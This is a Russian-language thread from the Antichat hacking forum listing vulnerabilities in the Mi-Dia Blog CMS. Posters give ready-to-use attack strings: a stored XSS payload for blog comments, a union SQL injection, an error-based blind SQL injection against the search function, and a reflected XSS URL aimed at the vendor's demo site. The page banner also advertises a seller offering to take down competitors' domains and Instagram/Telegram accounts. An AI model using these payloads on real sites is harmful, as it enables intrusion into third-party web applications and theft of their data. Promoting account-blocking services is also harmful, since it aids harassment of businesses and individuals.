Mi-Dia Blog

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Mi-Dia Blog

Опции темы

Поиск в этой теме

Опции просмотра

Mi-Dia Blog

08.11.2009, 06:27

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Mi-Dia Blog

Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/

Активная XSS.
В комментариях к записям блога.

Цитата:

[img]javascript:alert()[/img]

SQL Иньекция

Цитата:

?s=view&v=-1'+union+select+1,2,3,4,5,6,7,8,9+--+

Кода много, приведу тока фильтрациб.

PHP код:


		
			
$v = htmlspecialchars($_GET['v']);  

$d = htmlspecialchars($_GET['d']);

𝕏 Twitter Reddit Telegram Копировать ссылку

09.04.2010, 21:43

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

С нами: 8954306

Репутация: 1588

product : Mi-Dia Blog v1.0.4
Blind SQL
search --->
mq=off
mysql = 5

Код:

xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

Последний раз редактировалось [x60]unu; 09.04.2010 в 21:55..

09.04.2010, 22:25

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

С нами: 9594385

Репутация: 386

еще пассивная xss

Код:

http://demo.mi-dia.co.uk/?s=search&tags=%3Cscript%3Ealert(/xss/)%3C/script%3E

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Энциклопедия уязвимых скриптов	DIAgen	Веб-уязвимости	519	23.09.2021 11:44
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS	Corwin	Веб-уязвимости	1	19.09.2009 14:01
cmd blog	Дикс	PHP	13	16.04.2009 17:24
Уязвимости InTerra Blog Machine	Dimi4	Веб-уязвимости	0	08.01.2009 00:31
Invision Community Blog 1.1.0	jusuf	Уязвимости CMS / форумов	1	14.07.2006 18:55

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход